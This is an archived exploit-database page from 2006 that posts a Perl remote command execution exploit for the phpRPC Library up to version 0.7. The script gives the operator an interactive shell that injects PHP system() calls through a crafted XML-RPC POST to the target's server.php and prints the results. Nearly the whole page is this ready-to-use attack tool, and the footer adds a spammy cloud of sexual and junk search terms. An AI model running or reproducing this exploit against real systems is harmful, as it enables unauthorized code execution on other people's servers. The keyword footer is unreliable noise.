about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , phpRPC Library <= 0.7 XML Data Decoding Remote Code Execution (2)



2006-03-02 phpRPC Library <= 0.7 XML Data Decoding Remote Code Execution (2) 
Rated as : Moderate risk
#!/usr/bin/perl
#
# phpRPC <=0.7 Remote Command Execution Exploit
#
# based on:
http://www.gulftech.org/?node=research&article_id=00105-02262006
#
# Copyright (c) 2006 cijfer <cijfer@netti!fi>
# All rights reserved.
#
# never ctrl+c again.
# cijfer$ http://target.com/dir
# host changed to 'http://target.com/dir'
# cijfer$ 
#
# $Id: cijfer-prpcxpl.pl,v 0.1 2006/03/01 05:46:00 cijfer Exp $

use LWP::UserAgent;
use URI::Escape;
use Getopt::Long;
use Term::ANSIColor;

$res  = GetOptions("host=s" => \$host, "proxy=s"
=> \$proxy, "verbose+" => \$verbose);
&usage unless $host;

while()
{
	print color("green"), "cijfer\$ ",
color("reset");
	chomp($command = <STDIN>);
	exit unless $command;
	if($command =~ m/^http:\/\/(.*)/g)
	{
		$host="http://".$1;
		print "host changed to '";
		print color("bold"), $host."'\n",
color("reset");
	}
	else
	{
		&exploit($command,$host);
	}
}

sub usage
{
	print "phpRPC <=0.7 Remote Command Execution Exploit\n";
	print "usage: $0 -hpv\n\n";
	print "  -h, --host\t\tfull address of target (ex.
http://www.website.com/dir)\n";
	print "  -p, --proxy\t\tprovide an HTTP proxy (ex.
0.0.0.0:8080)\n";
	print "  -v, --verbose\t\tverbose mode (debug)\n\n";
	exit;
}

sub exploit
{
	my($command,$host) = @_;

	$cij=LWP::UserAgent->new() or die;
	$cij->agent("Mozilla/5.0 (X11; U; Linux i686; fi-FI; rv:2.0)
Gecko/20060101");
	$cij->proxy("http",
"http://".$proxy."/") unless !$proxy;

	$string  = shift;
	$xml     = "<?xml version=\"1.0\"?>";
	$xml    .= "<methodCall>";
	$xml    .= "<methodName>cijfer";
	$xml    .= "    <params>";
	$xml    .= "	    <param>";
	$xml    .= "	   
<value><base64>'));echo\"_cijfer_\n\";system('".$string."');echo\"_cijfer_\";exit();";
	$xml    .= "	    </param>";
	$xml    .= "    </params>";
	$xml    .= "</methodCall>";

	$req=new HTTP::Request
'POST'=>$host."/modules/phpRPC/server.php";
	$req->content_type("text/xml");
	$req->content($xml);
	$out=$cij->request($req);

	if($out->is_success)
	{
		@cij=split("_cijfer_",$out->content);
		print substr(@cij[1],1);
	}

	if($verbose)
	{
		$recv=length $out->content;
		print "Total received bytes: ".$recv."\n";
		$sent=length $command;
		print "Total sent bytes: ".$sent."\n";
	}
}

securitydot.net - 2006-03-02

Advertising

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 01:35:23 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
t120t Www.Pepero t550t www.jq100. o...324234 W w w teen sex movies news for c ATWServers www.malika 999 homosexved php advanc w.i.t.c.h. sun one mambo Remo ultimate p full naked Www.Pakist www.tf009. I agree wi xxxlivesex joomla com sex in usa BOKEP BARA apache 1.3 W w w teen mem to men Sabdrimer 192jb.info www.pbxoa. poor WWW.BEBO.C WWW.SEX CH WWW.Rapese Www.haifa. News Searc libtorrent www.trish Subdreamer Wwwmallika Subdreamer dggcdf.jio minigal www.haplad delete 0322 modules%25 +www.holly lo69l